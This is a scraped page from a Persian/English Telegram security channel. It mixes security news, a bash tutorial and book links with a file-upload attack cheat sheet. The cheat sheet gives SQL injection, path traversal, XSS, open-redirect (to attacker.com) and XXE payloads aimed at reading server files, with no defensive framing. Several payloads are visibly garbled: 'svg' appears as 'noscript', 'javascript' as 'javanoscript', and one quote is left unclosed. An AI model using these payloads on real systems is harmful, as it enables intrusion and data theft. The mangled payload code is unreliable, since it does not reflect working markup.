Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
The Way to Android Root: Exploiting Your GPU On Smartphone (#CVE-2024-23380)
@Engineer_Computer
Chaining Vulnerabilities through File Upload

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>


Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>

@Engineer_Computer
⭕️ استفاده از مدل‌های Large Language Models (LLMs) در کشف آسیب پذیری‌ها به شکل چشمگیری امنیت سایبری را متحول می‌کند، با خودکارسازی شناسایی آسیب‌پذیری‌ها، بهبود تحلیل تهدیدها. این مدل‌های پیشرفته، مانند GPT-4، به طور قابل توجهی بهره‌وری را با اسکن سریع کد، Generating Test Cases و ارائه گزارش‌های دقیق از آسیب‌پذیری‌ها بهبود می‌بخشند.
توانایی آن‌ها در پردازش و تحلیل حجم عظیمی از داده‌ها به متخصصان امنیت کمک می‌کند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLM‌ها در برنامه‌های Bug Bounty نه تنها شناسایی نقص‌های امنیتی را تسریع می‌کند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت می‌کند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/

The use of Large Language Models (LLMs) in vulnerability discovery will dramatically revolutionize cyber security by automating vulnerability detection and improving threat analysis. These advanced models, such as GPT-4, significantly improve productivity by quickly scanning code, generating test cases, and providing detailed reports of vulnerabilities.
Their ability to process and analyze massive amounts of data helps security professionals identify and fix potential vulnerabilities more effectively. Integrating LLMs into Bug Bounty programs not only accelerates the detection of security flaws, but also optimizes the overall threat detection process and, as a result, strengthens the defense against evolving cyber threats.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@Engineer_Computer
👍21
MITRE research firm reveals alarming details about a recent cyber attack that dates back to late 2023.
Adversary used backdoors, web shells, and credential harvesting to breach VMware infrastructure.
🔗 Read details:
https://thehackernews.com/2024/05/china-linked-hackers-used-rootrot.html

@Engineer_Computer
👍1
🔴 خطر حمله RCE به میلیون‌ها دستگاه با آسیب‌پذیری‌های بحرانی OpenVPN

محققان مایکروسافت به تازگی چندین آسیب‌پذیری با شدت متوسط و به بالا را در OpenVPN که یک نرم‌افزار متن‌باز VPN پرکاربرد است را کشف کرده‌اند.

نرم‌افزار OpenVPN توسط هزاران شرکت در صنایع مختلف، از‌جمله فناوری اطلاعات، خدمات مالی، مخابرات و نرم‌افزار‌های کامپیوتری، بر روی پلتفرم‌های اصلی مانند Windows، iOS، macOS، Android و BSD استفاده می‌شود.

این آسیب‌پذیری‌ها می‌توانند برای دستیابی به اجرای کد از راه دور (RCE) و افزایش اختیار محلی مورد سواستفاده قرار گیرند، که می‌تواند به مهاجمان اجازه دهد کنترل کامل دستگاه‌های هدف را به دست آورند. این امر خطر نقض داده‌ها، به خطر افتادن سیستم و دسترسی غیرمجاز به اطلاعات حساس را به همراه دارد.

آسیب‌پذیری‌ها در معماری سمت سرویس گیرنده OpenVPN، به ویژه در مکانیسم ارتباطی بین فرآیند openvpn[.]exe و سرویس openvpnserv[.]exe شناسایی شدند.

#Cybersecurity #Cyber_Attack #OpenVPN #RCE #DoS #VPN #Windows #Android #macOS #Vulnerability #امنیت_سایبری #حمله_سایبری #وی_پی_ان #ویندوز #مک

@Engineer_Computer
👍1
In today's world of expanding digital communications, APIs serve as crucial bridges between systems. Given their importance, defending APIs against attacks and malicious intrusions has become a key priority. Implementing advanced security protocols, robust authentication, and continuous monitoring are among the strategies that can ensure API security and protect sensitive data.
@Engineer_Computer
💠چگونه در زبان بش از یک تابع، یک مقدار را برگردانیم؟

مثال در python:
def add(x, y):
return x + y

result = add(3, 4)

print(result)

خروجی کد بالا عدد ۷ خواهد بود.

بش: (روش اول)
#!/bin/bash

add() {
return $(($1 + $2))
}

add 3 4
result=$?

echo $result

روش دوم: (کوتاه‌تر)
#!/bin/bash

add() {
echo $(($1 + $2))
}

add 3 4

توضیحات:

در روش اول که کمی طولانی‌تره، ما میام خروجی تابع رو با استفاده از متغیر داخلی بش ?$ نمایش می‌دیم. این متغیر درواقع exit code دستور قبلی رو ذخیره می‌کنه.
توابع در بش مقداری رو مثل پایتون برنمی‌گردونن و صرفا exit code که عددی بین ۰ تا ۲۵۵ است رو برمی‌گردونن.
در تابع add، عبارت return درواقع باعث می‌شه که جمع آرگومان‌های تابع به‌عنوان exit status گزارش بشه.
متغیر داخلی ?$ این exit status رو ذخیره می‌کنه، که می‌شه جمع ۳ و ۴ و عدد ۷ رو نمایش می‌ده.

در مثال دوم که ساده‌تره و راحت‌تر هم هست ما پارامترهای 1$ و 2$ رو به تابع می‌دیم و از اونجایی که اکو در تابع تعریف شده، مقدار برگردانده می‌شه و در ترمینال چاپ میشه.

@Engineer_Computer
#آموزش #لینوکس #بش
👍1
WebApp_Sec.pdf
14.2 MB
Techbook
WebApp Security
Web Application Security:
Exploitation and Countermeasures for Modern Web Applications 2024.

——————————————————
#CyberSecurity #webapp #OWASP #secure
@Engineer_Computer
1
Hardware Security
PKfail Research Report 2024.
https://www.binarly.io/blog/pkfail-u

@Engineer_Computer

——————————————————
#CyberSecurity #Hardware #CVE
#SecureBusinessContinuity
2024 sec.pdf
6.1 MB
PKfail
Supply - Chain Failures in Secure Boot Key Management
@Engineer_Computer
AMH.pdf
49.8 MB
Tech book
Mobile Security
Malware analysis
The Android Malware Handbook:
Detection and Analysis by Human and Machine 2024.
@Engineer_Computer